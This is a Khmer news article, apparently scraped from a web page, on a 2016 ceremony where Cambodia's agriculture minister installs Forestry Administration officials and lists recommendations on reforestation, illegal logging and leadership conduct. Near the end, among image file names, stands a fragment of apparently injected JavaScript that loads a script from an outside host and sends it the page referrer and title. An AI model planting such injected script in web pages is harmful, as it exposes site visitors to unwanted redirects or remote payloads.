ពិធីប្រកាសចូលកាន់តំណែងមន្ត្រីរដ្ឋបាលព្រៃឈើ ក្រោមអធិបតីភាព ឯកឧត្តម វេង សាខុន

ភ្នំពេញ៖ នៅព្រឹកថ្ងៃ១៨ ខែសីហា ឆ្នាំ២០១៦ នៅវិទ្យាស្ថានស្រាវជ្រាវ និងអភិវឌ្ឍន៍ព្រៃឈើ សត្វព្រៃនៃរដ្ឋបាលព្រៃឈើ ឯកឧត្តម វេង សាខុន រដ្ឋមន្ត្រីក្រសួងកសិកម្ម រុក្ខាប្រមាញ់ និងនេសាទ បានអញ្ជើញជាអធិបតីក្នុងពិធីប្រកាសចូលកាន់តំណែងមន្ត្រីរដ្ឋបាលព្រៃឈើ និងពិធីសំណេះសំណាលជាមូយ មន្ត្រីរដ្ឋបាលព្រៃឈើ ។ អញ្ជើញចូលរួមក្នុងកម្មវិធីនេះ រួមមាន: ឯកឧត្តម លោកជំទាវថ្នាក់ដឹកនាំក្រសួង ថ្នាក់ដឹកនាំអង្គភាពក្រោមឱវាទនៃក្រសួងកសិកម្ម រុក្ខាប្រមាញ់ និងនេសាទ ហើយនិង ឯកឧត្តម អស់លោក លោកស្រី នាងកញ្ញា ជាមន្ត្រីរដ្ឋបាលព្រៃឈើគ្រប់ជាន់ថ្នាក់ជាច្រើនរូប។

ក្រោយពីបានស្តាប់របាយការណ៍របស់ឯកឧត្តមប្រធានរដ្ឋបាលព្រៃឈើ និងការប្ដេជ្ញាចិត្តរបស់មន្ត្រីរដ្ឋបាលព្រៃឈើទើបទទួលបានការតែងតាំងថ្មីរួចមក ឯកឧត្តមរដ្ឋមន្ត្រីបានមានប្រសាសន៏សំណេះ សំណាល និងផ្តល់នូវអនុសាសន៍មួយ ចំនួនដល់រដ្ឋបាលព្រៃឈើ ដើម្បីកែលម្អធ្វើឲ្យប្រសើរឡើងវិញនូវការគ្រប់គ្រងវិស័យព្រៃឈើស្របតាមគោល នយោបាយកំណែទម្រង់ស៊ីជម្រៅ របស់រាជរដ្ឋាភិបាល ដែលមានខ្លឹមសារដូចខាងក្រោម៖

ទី១. មន្ត្រីគ្រប់រូបត្រូវរៀនសូត្រនូវរាល់បទពិសោធន៍ដែលទទួលបាន ហើយត្រូវធ្វើការផ្លាស់ប្តូរនូវរបត់ថ្មីមួយ ដើម្បីឆ្លើយតបទៅនឹងការផ្លាស់ប្តូរនយោបាយ និងសេដ្ឋកិច្ចរបស់កម្ពុជានាពេលបច្ចុប្បន្ន។ ត្រូវគិតគូរពិចារណាទៅលើការកែសម្រួលរចនាសម្ព័ន្ធ និងភារកិច្ចទទួលខុសត្រូវរបស់ខ្លួន ដោយត្រួវាឆ្លើយតបទៅនឹងតម្រួវការក្នុងសភាពការចំពោះមុខ។

ទី២. គ្រប់អង្គភាពក្រោមឳវាទរដ្ឋបាលព្រៃឈើទាំងអស់ ត្រូវខិតខំប្រឹងប្រែងរៀបចំកញ្ចប់ថវិកាឲ្យបានពេញលេញសម្រាប់អនុវត្តផែនការសកម្មភាពរបស់ក្រសួងនៅឆ្នាំ២០១៧ ខាងមុខនេះឲ្យបានទាន់ពេលវេលាតាមតម្រូវការជាក់ស្តែងឲ្យស្របតាមនយោបាយកំណែទម្រង់របស់ក្រសួង។

ទី៣. រៀបចំធ្វើផែនការគ្រប់គ្រង់ដី និងអភិវឌ្ឍន៍ធ្វើការដាំដុះព្រៃឈើឡើងវិញលើដី ដែលបានដកហូតពីក្រុមហ៊ុនសម្បទានដីសេដ្ឋកិច្ច។ ទន្ទឹមនឹងនេះ ត្រូវធ្វើការពិគ្រោះយោបល់ជាមួយក្រសួងសេដ្ឋកិច្ច និងហិរញវត្ថុទៅលើការដាំដុះព្រៃឈើឡើងវិញ ដោយអនុវត្តតាមនីតិវិធីលទ្ធកម្ម ទៅលើការដាំដុះ និងថែទាំក្នុងរយៈពេលមួយតាមការព្រមព្រៀងគ្នារវាងរដ្ឋបាលព្រៃឈើ និងក្រុមហ៊ុនដាំដុះព្រៃឈើ។ ជាងនេះទៅទៀតរដ្ឋបាលព្រៃឈើអាចដើរតួនាទីសំខាន់ក្នុងការធ្វើផែនការ និងតាមដានត្រួតពិនិត្យលើការអនុវត្ត ការដាំដុះ និងថែរក្សាព្រៃឈើ ដោយត្រូវប្រែក្លាយការដាំដុះព្រៃឈើ ដើម្បីលើកម្ពស់សេដ្ឋកិច្ចជាតិ។ បន្តរកៀរគរ និងពង្រឹងកិច្ចសហប្រតិបត្តិការជាមួយដៃគូអភិវឌ្ឍ លើការគាំទ្រថែរក្សាព្រៃឈើនៅតាមសហគមន៍ព្រែឈើដោយត្រូវផ្តល់ការគាំទ្រដល់ការអភិវឌ្ឍកសិកម្មចម្រុះនៅក្នុងតំបន់សហគមន៍ ដើម្បីលើកកម្ពស់ជីវភាពរស់នៅរបស់កសិករទៅក្នុងសហគមន៍ តាមរយៈការចិញ្ចឹមសត្វពាហនៈ ជាពិសេសគោ ក្របី និងការដាំដុះបន្លែបង្ការផ្សេងៗជាមួយនឹងការរៀបចំតំបន់អេកូទេសចណ៍។

ទី៤. ធ្វើការសម្របសម្រួលជាមួយអ្នកពាក់ព័ន្ធទាំងអស់លើការងារគ្រប់គ្រង និងការពារអភិរក្សព្រៃឈើ ដោយចាត់ទុកពួកគេជាដៃគូដ៏ល្អសម្រាប់យើង ដោយទទួលយកយោបល់ និងសំណួមពរនានារបស់គេមកពិចារណា ពិនិត្យ ដោះស្រាយ និងមានវិធានការទាន់ពេលវេលា។ ផ្ទុយមកវិញកុំធ្វើការបង្កើនសត្រូវនៅជុំវិញការងាររបស់យើង។

ទី៥. បន្តខិតខំប្រឹងប្រែងទប់ស្កាត់ ការកាប់បំផ្លាញព្រៃឈើ ការដឹកជញ្ជូន ការកែច្នៃផល អនុផលព្រៃឈើ ការចាប់ និងដឹកជញ្ជូនសត្វព្រៃដោយខុសច្បាប់។ ពិសេស ត្រូវរឹតបន្តឹងការអនុវត្តច្បាប់ស្តីពីព្រៃឈើឲ្យបានម៉ឹងម៉ាត់បំផុត។ ទន្ទឹមនឹងនេះក៏ត្រូវបង្កើនការយកចិត្តទុកដាក់ដល់ការជួយទំនុកបម្រុងឧបត្ថម្ភឲ្យបានគ្រប់គ្រាន់ក្នុងការបង្រាបបទល្មើស។ចំណុចនេះ ខ្ញុំបានកត់សម្គាល់ឃើញថា តាមសេចក្តីរាយការណ៍របស់អគាធិការដ្ឋាននាពេលថ្មីៗនេះបានឲ្យដឹងថា៖
– នៅក្នុងឆ្នាំ ២០១៥ កន្លងទៅការបង្រាបបទល្មើសព្រៃឈើខេត្តបាត់ដំបង បានចំណាយថវិការអស់ចំនួន ២ ៥៦០ ០០០៛ ក្នុងការធ្វើប្រតិបត្តិការបង្រាបបានពីរករណី ហើយត្រូវទូទាត់ចំណាយទៅលើថ្លៃឈ្នួលលើកដាក់វត្ថុតាង។ ដោយឡែកមន្ត្រីរដ្នបាលព្រៃឈើមានមន្ត្រីប្រមាណជា ៦៣នាក់។
– នៅក្នុងឆ្នាំ២០១៥ នេះដដែល ការបង្រាបបទល្មើលជលផលករណីដូចគ្នាដែរខេត្តបាត់ដំបង បានចំណាយអស់ថវិកាចំនួន ១៣២ ៩០៤ ០០០៛ និងការពារតំបន់អិរក្សអស់ចំនួន ១៧១ ៣៦០ ០០០៛។

ទី៦. បន្តការងារសហការឲ្យបានល្អប្រសើរជាមួយលេខាធិការដ្ឋានបច្ចេកទេសសម្រាប់សម្បទានដីសេដ្ឋកិច្ច លើការធ្វើសារពើភ័ណ្ឌព្រៃឈើ នៅលើសម្បទានដីសេដ្ឋកិច្ច និងការវាស់វែង វាយតម្លៃឈើដែលបានកាប់ផ្តួលរំលំ ដែលស្ថិតនៅក្នុងតំបន់អនុញាតឲ្យធ្វើការឈូសឆាយ លើសម្បទានដីសេដ្ឋកិច្ច។

ទី៧. ត្រូវបង្កើតថ្នាលបណ្តុះកូនឈើនៅតាមស្នាក់ការសង្កាត់ ផ្នែក និងខណ្ឌរដ្ឋបាលព្រៃឈើមូលដ្ឋានដើម្បីបណ្តុះកូនឈើចែកជូនប្រជាពលរដ្ឋ។ មន្ត្រីរដ្ឋបាលព្រៃឈើមូលដ្ឋានត្រូវជួយណែនាំបច្ចេកទេសដាំដុះ និងបណ្តុះកូនឈើដល់សហគមន៍ព្រៃឈើ និងប្រជាពលរដ្ឋនៅក្នុងមូលដ្ឋានដែលមានបំណងចង់ដាំដុះដើមឈើដើម្បីជួយអប់រំប្រជាពលរដ្ឋឲ្យងាកពីការផ្លាស់ប្តូរទីលំនៅដោយលការកាប់បំផ្លាញព្រៃឈើ ដោយត្រូវជំរុញ និងបង្កើនផលិតផលភាពកសិកម្ម តាមរយៈការធ្វើប្រជាពលវប្បកម្ម និងពិពិធកម្មកសិកម្មទាំងលើដំណាំ ការចិញ្ចឹមសត្វ ការគ្រប់គ្រងទឹក កសិរុក្ខកម្ម ការគ្រប់គ្រង និងអភិវឌ្ឍន៍ធនធានជលផល វារីវប្បកម្ម និងអនុផលព្រៃឈើដែលបម្រើឲ្យវិស័យស្បៀង និងអាហារូបត្ថម្ភ ព្រមទាំងបង្កបវិយាកាសដើម្បីលើកស្ទួយការវិនិយោគទុនពីវិស័យឯកជន និងបង្កើតការងារនៅមូលដ្ឋាន។ ជាមួយនេះ ក៏មិនត្រូវមើលរំលងអំពីការអប់រំផ្សព្វផ្សាយដល់បងប្អូនប្រជាពលរដ្ឋដែលតែងតែចូលទៅកាប់ឈើខុសច្បាប់នៅក្នុងទឹកដីនៃប្រទេសជិតខាងដែលបង្កឲ្យមានគ្រោះថ្នាក់ដល់អាយុជីវិតថែមទៀតផង។

ទី៨. មន្ត្រីជំនាញពាក់ព័ន្ធទាំងអស់ត្រូវបន្តពង្រឹងកិច្ចសហការជាប់ជាប្រចាំជាមួយអាជ្ញាធរដែនដី គណៈបញ្ជាការឯកភាពរដ្ឋបាលរាជធានី ខេត្ត ក្រុង ស្រុក ខណ្ឌ ឃុំ សង្កាត់ដើម្បីទប់ស្កាត់ លុបបំបាត់ និងបង្រាបបទល្មើសតាមគ្រប់រូបភាព ក្នុងនោះមានបទល្មើសព្រៃឈើ ជលផល ចលនាសត្វដោយខុសច្បាប់ក្នុងដែនសមត្ថរបស់ខ្លួន ពិសេសតំបន់ជាប់ព្រំដែនក្នុងស្មារតីសហការទទួលខុសត្រូវ។ បន្តចុះពិនិត្យ និងអង្កេតនៅទីវាលជាក់ស្តែងដែលប្រជាពលរដ្ឋបានដាក់ពាក្យបណ្តឹងតវ៉ាដើម្បីជាមូលដ្ឋាននៃការសម្រេច ព្រមទាំងផ្សព្វផ្សាយអំពីការទប់ស្កាត់បទល្មើសកាប់រាន ដុត ឈូសឆាយ និងហ៊ុមព័ទ្ធដីព្រៃឈើដើម្បីវាតយកដីធ្វើជាកម្មសិទ្ធដោយសហការជាមួយសមត្ថកិច្ចពាក់ព័ន្ធ ដើម្បីធ្វើការបង្រាបបទល្មើសព្រៃឈើឲ្យទាន់ពេលវេលា និងេជំរុញចលនារួមការដាំដើមឈើ។

ទន្ទឹមនឹងនេះ ក្នុងគោលបំណងបង្កើននូវប្រសិទ្ធភាពការងារ និងភាពជាអ្នកដឹកនាំការងារល្អ សូមបន្តការយកចិត្តទុកដាក់លើការងារមួយចំនួនដូចតទៅ៖

១. ត្រូវចេះស្វែងរកការងរឱ្យមន្ត្រីថ្នាក់ក្រោមធ្វើ ដោយមិនត្រូវរង់ចាំការងាររត់មករកខ្លូននោះទេ ពោលគឺត្រូវតែរត់ទៅរកការងារ។ ត្រូវប្រកាន់ខ្ជាប់លើការគ្រប់គ្រងមន្រ្តីរាជការប្រកបដោយយុត្តិធម៌ ប្រគល់ការងារទៅតាមសមត្ថភាព ព្រមទាំងទប់ស្កាត់នូវរាល់អំពើញុះញង់ និងបំបែកបំបាក់ផ្ទៃក្នុង និងត្រូវផ្តល់កិត្តិយសជូនដល់មន្ត្រីក្រោមឱវាទរបស់ខ្លូនឱ្យបានល្អប្រកបដោយសមធម៌។

២. ត្រូវមានការស្វែងយល់ពីភាពរីកចម្រើន និងសេចក្តីត្រូវការក្នុងសង្គមនៅក្នុងវិស័យរបស់ខ្លូន ដោយត្រូវចេះច្នៃប្រឌិតសកម្មភាពការងាររបស់ខ្លួនឆ្លើយតបទៅនឹងសេចក្តីត្រូវការចំបាច់ ជាមួយនឹងការហ៊ានវះកាត់ចំពោះបញ្ហាប្រឈមបានទាន់ពេលវេលា។ ជាពិសេសត្រូវយកចិត្តទុកដាក់ពិនិត្យ និងផ្តល់គ្រឿងឥស្សរិយយស និងដំឡើងកាំប្រាក់ជូនដល់មន្ត្រីក្រោមឱវាទឱ្យបានទៀងទាត់ និងសុក្រឹតភាព។

៣. ត្រូវប្រកាន់ខ្ជាប់នូវនយោបាយសមូហភាពដឹកនាំ បុគ្គលទទួលខុសត្រូវ (រាជរដ្ឋាភិបាល និងថ្នាក់ដឹកនាំមិនអាចជួយការពារចំពោះមន្រ្តីណាម្នាក់ដែលប្រព្រឹត្តអំពើខុសឆ្គងធ្ងន់ធ្ងរបានទេ ជាពិសេសបើមានការចោទប្រកាន់ពីតុលាការក្នុងការប្រព្រឹត្តអំពើពុករលួយ)។
៤. មិនត្រូវទៅដណ្តើមការងារពីមន្ត្រីថ្នាក់ក្រោមធ្វើនោះទេ តែត្រូវចេះវះកាត់ក្នុងករណីមានបញ្ហាប្រឈមនិងមិនត្រូវយកតួនាទីរបស់ខ្លួនធ្វើជាខ្នងបង្អែកឱ្យឈ្មួញ ឬក្រុមបក្សពួករបស់ខ្លួនឡើយ។

៥. មិនត្រូវធ្វើខ្លួនឱ្យឃ្លាតឆ្ងាយពីមហាជន ជាពិសេសមន្ត្រីក្រោមឱវាទរបស់ខ្លួន។មិនត្រូវបំបែកបំបាក់ផ្ទៃក្នុង ដើម្បីកេងចំណេញយកផលប្រយោជន៍សម្រាប់បុគ្គលខ្លួននោះទេ និងមិនត្រូវលាបពណ៌គេឯងមើលបំណាំគ្នា ជាពិសេសមន្ត្រីដែលស្ថិតនៅក្រោមបន្ទុករបស់ខ្លួនដែលបង្កឱ្យមានភាពអសកម្មនៅក្នុងអង្គភាព។

៦. មន្រ្តីរាជការគ្រប់ជាន់ថ្នាក់ទាំងអស់ត្រូវអនុវត្តឱ្យបានជាប្រចាំ និងប្រកបដោយប្រសិទ្ធភាព ទាំងក្រុមសីលធម៌មន្ត្រីរាជការ ក្នុងការគ្រប់គ្រងការដឹកនាំការងារ បំពេញភារកិច្ច ដូចមានចែងក្នុងជំពូកទី៥ ពីមាត្រា ៣៣ ដល់ ៣៨ ក្នុងច្បាប់ស្តីពីសហលក្ខន្តិកៈមន្ត្រីរាជការស៊ីវិលនៃព្រះរាជាណាចក្រកម្ពុជា។

៧. ថ្នាក់ដឹកនាំទទួលបន្ទុកអង្គភាពជំនាញនីមួយៗ ត្រូវយកចិត្តទុកដាក់អនុវត្តភារកិច្ចក្នុងស្មារតីទទួលខុសត្រូវទៅតាមឋានានុក្រមដើម្បីឱ្យដំណើការប្រព្រឹត្តទៅរបស់អង្គភាពនីមួយៗ មានភាពរលូន និងប្រសិទ្ធភាពខ្ពស់។

៨. ថ្នាក់ដឹកនាំទទួលបន្ទុកត្រូវតាមដានសភាពការណ៍ប្រចាំថ្ងៃ ជាពិសេសទៅលើមតិយោបល់របស់ប្រជាជន និងការវាយប្រហារចេញពីសង្គមស៊ីវិល ឬចេញពីផ្ទៃក្នុងក្រសួងយើងផងដែរ និងបញ្ហាប្រឈមផ្សេងៗ ទាក់ទងទៅនឹងបញ្ហានេះរដ្ឋបាលព្រៃឈើគួរមានបើក Hotline មួយដើម្បីទទួលនូវព័ត៌មាន និងសំណូមពររបស់សហគមន៍ សង្គមស៊ីវិលនិងដៃគូទាំងអស់ ដើម្បីយកមកពិនិត្យ និងដោះស្រាយ ពោលគឺកុំធ្វើខ្លួនឱ្យក្លាយជាសត្រូសជាមួយអ្នកទាំងនោះឱ្យសោះ។

៩. ថ្នាក់ដឹកនាំរដ្ឋបាលព្រៃឈើត្រូវធ្វើសកម្មភាពឆ្លើយតបភ្លាមៗ ឬចុះទៅដល់គោលដៅដែលមានបញ្ហាប្រឈម ដើម្បីធ្វើការដោះស្រាយ ឬលើកទឹកចិត្តដល់ប្រជាជន។ លើសពីនេះទៀត សូមឱ្យថ្នាក់ដឹកនាំ និងមន្ត្រីគ្រប់អង្គភាពទាំងអស់ ពិសេសមន្ត្រីរដ្ឋបាលព្រៃឈើនៅមូលដ្ឋានត្រូវមានអារម្មណ៍ហ្នឹងហ្នររក្សាបាននូវសភាពស្ងប់ស្ងៀម ខិតខំបំពេញភារកិច្ច កុំឱ្យមានការព្រួយបារម្ភ និងមានការរំជើបរំជួលទៅលើអី្វមួយនោះឡើយ។ ត្រូវប្រកាន់ខ្ជាប់នូវសាមគ្គីភាព ឯភាពផ្ទៃក្នុងខ្ពស់ក្នុងការបំពេញភារកិច្ច ចេះពិភាក្សាគ្នាក្នុងស្មារតីយោគយល់និងស្ថាបនា។

13932889_1191979580840244_2520678232951817932_n 14045548_1191979590840243_4791931629785459957_n 14054033_1191979334173602_5210729583724453959_n 14055043_1191979587506910_3374401953455037750_n 14063900_1191979404173595_671578111342383995_ns.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More